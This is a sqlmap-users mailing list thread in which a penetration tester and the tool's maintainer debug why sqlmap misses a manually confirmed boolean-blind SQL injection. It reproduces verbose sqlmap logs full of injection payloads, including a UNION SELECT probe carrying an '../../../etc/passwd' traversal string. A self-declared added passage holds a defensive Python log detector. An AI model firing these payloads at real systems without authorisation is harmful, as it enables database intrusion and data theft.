I would say that you screwed something up. Can you please send that traffic
file I requested.

Down below find a line that says: "[08:55:08] [PAYLOAD] PackageSelection'
AND 1595=1103 AND 'cBLQ'='cBLQ". That is the proof that your claims are
invalid.

$ python sqlmap.py -u www.site.com/help/UserGuide.aspx?Sec=PackageSelection
--dummy -v 3
         _
 ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 08:55:05

[08:55:05] [DEBUG] cleaning up configuration parameters
[08:55:05] [DEBUG] setting the HTTP timeout
[08:55:05] [DEBUG] creating HTTP requests opener object
[08:55:05] [DEBUG] heuristically checking if the target is protected by
some kind of WAF/IPS/IDS
[08:55:05] [PAYLOAD] WVJJ=8692 AND 1=1 UNION ALL SELECT 1,2,3,table_name
FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
[08:55:05] [DEBUG] setting match ratio for current parameter to 0.743
[08:55:05] [INFO] testing if the target URL is stable. This can take a
couple of seconds
[08:55:06] [WARNING] target URL is not stable. sqlmap will base the page
comparison on a sequence matcher. If no dynamic nor injectable parameters
are detected, or in case of junk results, refer to user's manual paragraph
'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[08:55:08] [INFO] searching for dynamic content
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.446
[08:55:08] [CRITICAL] target URL is heavily dynamic. sqlmap is going to
retry the request
[08:55:08] [INFO] searching for dynamic content
[08:55:08] [INFO] testing if GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] 2485
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.867
[08:55:08] [INFO] confirming that GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] 8682
[08:55:08] [INFO] GET parameter 'Sec' is dynamic
[08:55:08] [PAYLOAD] PackageSelection)"'.)"").'
[08:55:08] [WARNING] heuristic (basic) test shows that GET parameter 'Sec'
might not be injectable
[08:55:08] [PAYLOAD] PackageSelection'LcAd<'">Hovs
[08:55:08] [INFO] testing for SQL injection on GET parameter 'Sec'
[08:55:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:55:08] [PAYLOAD] PackageSelection) AND 4774=3078 AND (8643=8643
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.833
[08:55:08] [PAYLOAD] PackageSelection) AND 1559=1559 AND (3186=3186
[08:55:08] [PAYLOAD] PackageSelection AND 8581=4897
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.851
[08:55:08] [PAYLOAD] PackageSelection AND 1559=1559
[08:55:08] [PAYLOAD] PackageSelection') AND 6273=6522 AND ('YHvu'='YHvu
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.554
[08:55:08] [PAYLOAD] PackageSelection') AND 1559=1559 AND ('sTiQ'='sTiQ
[08:55:08] [PAYLOAD] PackageSelection') AND 3601=4813 AND ('ParN'='ParN
[08:55:08] [PAYLOAD] PackageSelection' AND 1595=1103 AND 'cBLQ'='cBLQ
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.745
[08:55:08] [PAYLOAD] PackageSelection' AND 1559=1559 AND 'uIvd'='uIvd
[08:55:08] [PAYLOAD] PackageSelection' AND 8619=5317 AND 'RtrE'='RtrE
[08:55:08] [PAYLOAD] PackageSelection%' AND 3991=4465 AND '%'='
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.495
[08:55:08] [PAYLOAD] PackageSelection%' AND 1559=1559 AND '%'='
[08:55:08] [PAYLOAD] PackageSelection%' AND 5263=7541 AND '%'='
[08:55:08] [PAYLOAD] PackageSelection AND 8168=8736-- pZYt
[08:55:08] [DEBUG] setting match ratio for current parameter to 0.685
[08:55:08] [PAYLOAD] PackageSelection AND 1559=1559-- NfAy
...
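For defenders reading the payload lines above: the pairs of probes differ only in whether the appended comparison is a tautology (1559=1559) or a contradiction (1595=1103), and that pairing is what a web server log shows. The following detector is an added example, not code from this thread or from sqlmap; the log lines are constructed in Common Log Format, and the client address, timestamps and sizes are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access log lines. The query strings reproduce the probe shapes
# seen in the sqlmap run above (URL-encoded as a browser or tool would send them).
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1" 200 5120
10.0.0.5 - - [28/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%29+AND+4774%3D3078+AND+%288643%3D8643 HTTP/1.1" 200 4988
10.0.0.5 - - [28/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%29+AND+1559%3D1559+AND+%283186%3D3186 HTTP/1.1" 200 5120
10.0.0.5 - - [28/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27+AND+1595%3D1103+AND+%27cBLQ%27%3D%27cBLQ HTTP/1.1" 200 4988
10.0.0.5 - - [28/Apr/2015:08:55:08 +0000] "GET /help/UserGuide.aspx?Sec=PackageSelection%27+AND+1559%3D1559+AND+%27uIvd%27%3D%27uIvd HTTP/1.1" 200 5120
10.0.0.9 - - [28/Apr/2015:08:56:01 +0000] "GET /help/UserGuide.aspx?Sec=Billing HTTP/1.1" 200 6001
"""

# Common Log Format request line: client, timestamp, method, request target, status, size.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# "AND <a>=<b>" with numeric or quoted operands; the two groups let us tell a
# tautology (operands equal) from a contradiction (operands differ).
COMPARISON_RE = re.compile(r"""\bAND\s+['"]?(\w+)['"]?\s*=\s*['"]?(\w+)['"]?""", re.I)


def classify(value):
    """Return 'true' for a tautology probe, 'false' for a contradiction, None otherwise."""
    m = COMPARISON_RE.search(value)
    if not m:
        return None
    return "true" if m.group(1) == m.group(2) else "false"


def find_boolean_blind_probes(log_text):
    """Count tautology/contradiction probes per (client, path, parameter) and
    return only the parameters that received both kinds: the boolean-blind signature."""
    probes = {}
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl decodes %27 and '+' so the regex sees the payload as the database would.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            verdict = classify(value)
            if verdict:
                key = (m.group("ip"), parts.path, name)
                probes.setdefault(key, {"true": 0, "false": 0})[verdict] += 1
    return {k: v for k, v in probes.items() if v["true"] and v["false"]}


if __name__ == "__main__":
    for (ip, path, param), counts in find_boolean_blind_probes(SAMPLE_LOG).items():
        print(f"{ip} probed {path} parameter {param!r}: {counts}")
```

A single tautology alone is weak evidence (legitimate values can contain "and"); the alert here requires both halves of the pair from the same client against the same parameter.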

On Tue, Apr 28, 2015 at 3:15 PM, Alistair Johnson <amcljohn...@gmail.com>
wrote:

> Hi Brandon,
>
> Thanks for your comment. Confirming that I've tried risk=3 with
> level=5 with the same results. I've looked more closely at the
> requests that sqlmap is sending to check if the parameter is
> injectable. It is testing the Sec parameter with values such as:
>
> PackageSelection) AND 1477=7114
> PackageSelection) AND 1631=1631
> PackageSelection') AND 5603=7729
> PackageSelection') AND 1631=1631
> PackageSelection' AND 3943=9381
> PackageSelection' AND 1631=1631
> PackageSelection" AND 3324=4690
> PackageSelection" AND 1631=1631
> PackageSelection) AND 4734=6616 AND (6346=6346
> PackageSelection)) AND 7350=9272 AND (8861=8861
>
> When in fact, I assume it would need to use logic like I used to get
> distinguishable responses:
>
> PackageSelection (returns response A)
> PackageSelection' AND '1'='1 (returns response A)
> PackageSelection' AND '1'='2 (returns response B)
>
> In a nutshell, it doesn't appear to be trying single quotes and values
> in the ' AND '1'='1 pattern. But I would have thought this is a pretty
> typical format for checking boolean-based blind SQLi.
>
> Cheers,
>
> Alistair.
>
> On Tue, Apr 28, 2015 at 10:36 PM, Brandon Perry
> <bperry.volat...@gmail.com> wrote:
> > It's a GET, so there wouldn't be a content type, unless I am mistaken.
> >
> > Alistair, have you tried --risk=3 with --level=5 yet?
> >
> > Sent from a phone
> >
> > On Apr 28, 2015, at 7:13 AM, Miroslav Stampar <miroslav.stam...@gmail.com>
> > wrote:
> >
> > Can you please send the unredacted content of request.txt to my address?
> >
> > If not, then please at least send me the content of traffic file which you
> > can obtain by just appending the "-t traffic.txt" to the regular sqlmap's
> > run.
> >
> > Bye
> >
> > On Tue, Apr 28, 2015 at 2:10 PM, Alistair Johnson <amcljohn...@gmail.com>
> > wrote:
> >>
> >> Thanks for the quick reply.
> >>
> >> The contents of the request file are as follows:
> >>
> >> GET /help/UserGuide.aspx?Sec=PackageSelection HTTP/1.1
> >> Host: <redacted>
> >> Accept: */*
> >> Accept-Language: en
> >> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
> >> x64; Trident/5.0)
> >> Connection: close
> >> Referer: <redacted>
> >> Cookie: <redacted>
> >>
> >> I've redacted some of the details as it's not appropriate to draw
> >> attention to an internet facing application's SQLi vulnerability.
> >>
> >> When providing the request file as part of the following command:
> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> 'industries' -v 1
> >>
> >> sqlmap executes as normal but cannot identify (and therefore cannot
> >> exploit) the boolean-based blind vulnerability which I've verified
> >> manually.
> >>
> >> Thanks again,
> >>
> >> Al.
> >>
> >>
> >> On Tue, Apr 28, 2015 at 9:59 PM, Miroslav Stampar
> >> <miroslav.stam...@gmail.com> wrote:
> >> > And what is the content of request file?
> >> >
> >> > Bye
> >> >
> >> > On Tue, Apr 28, 2015 at 1:03 PM, Alistair Johnson
> >> > <amcljohn...@gmail.com>
> >> > wrote:
> >> >>
> >> >> Hi sqlmappers,
> >> >>
> >> >> I'm a fairly experienced user of sqlmap having used it extensively in
> >> >> the past. I came across what appeared to be pretty typical boolean-based
> >> >> blind SQLi in an application I'm (legally) testing. However, for the
> >> >> first time, I'm unable to get sqlmap to recognise the parameter as
> >> >> vulnerable to exploit it further. And as we know, manually exploiting
> >> >> blind SQLi is cumbersome to say the least.
> >> >>
> >> >> Here is a summary of the requests I've made to manually confirm the
> >> >> vulnerability.
> >> >>
> >> >> /help/UserGuide.aspx?Sec=PackageSelection (returns response A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='1 (returns response A)
> >> >> /help/UserGuide.aspx?Sec=PackageSelection'+and+'1'='2 (returns response B)
> >> >>
> >> >> I've tried various sqlmap flags and thought the following command
> >> >> would give me the best chance of success:
> >> >>
> >> >> sqlmap -r '<request file>' -p 'Sec' --dbms 'Microsoft SQL Server'
> >> >> --level=4 --proxy=http://127.0.0.1:8080 --technique=B --string
> >> >> 'industries' -v 1
> >> >>
> >> >> Note: the string 'industries' is text that appears in response A but
> >> >> not response B.
> >> >>
> >> >> I've looked at the requests that sqlmap is sending in the background
> >> >> (proxied through burp). It appears that it's attempting to exploit
> >> >> this with the AND statement as it should but is not using single
> >> >> quotes as per my example above.
> >> >>
> >> >> I'd appreciate any insight. If this is a shortcoming in sqlmap, I'd be
> >> >> more than happy to contribute some time to improve it so it can
> >> >> identify injectable parameters such as these in the future.
> >> >>
> >> >> Thanks,
> >> >>
> >> >> Al.
> >> >>
> >> >>
> >> >>
> >> >>
> >> >> _______________________________________________
> >> >> sqlmap-users mailing list
> >> >> sqlmap-users@lists.sourceforge.net
> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >> >
> >> >
> >> >
> >> >
> >> > --
> >> > Miroslav Stampar
> >> > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
>



-- 
Miroslav Stampar
http://about.me/stamparm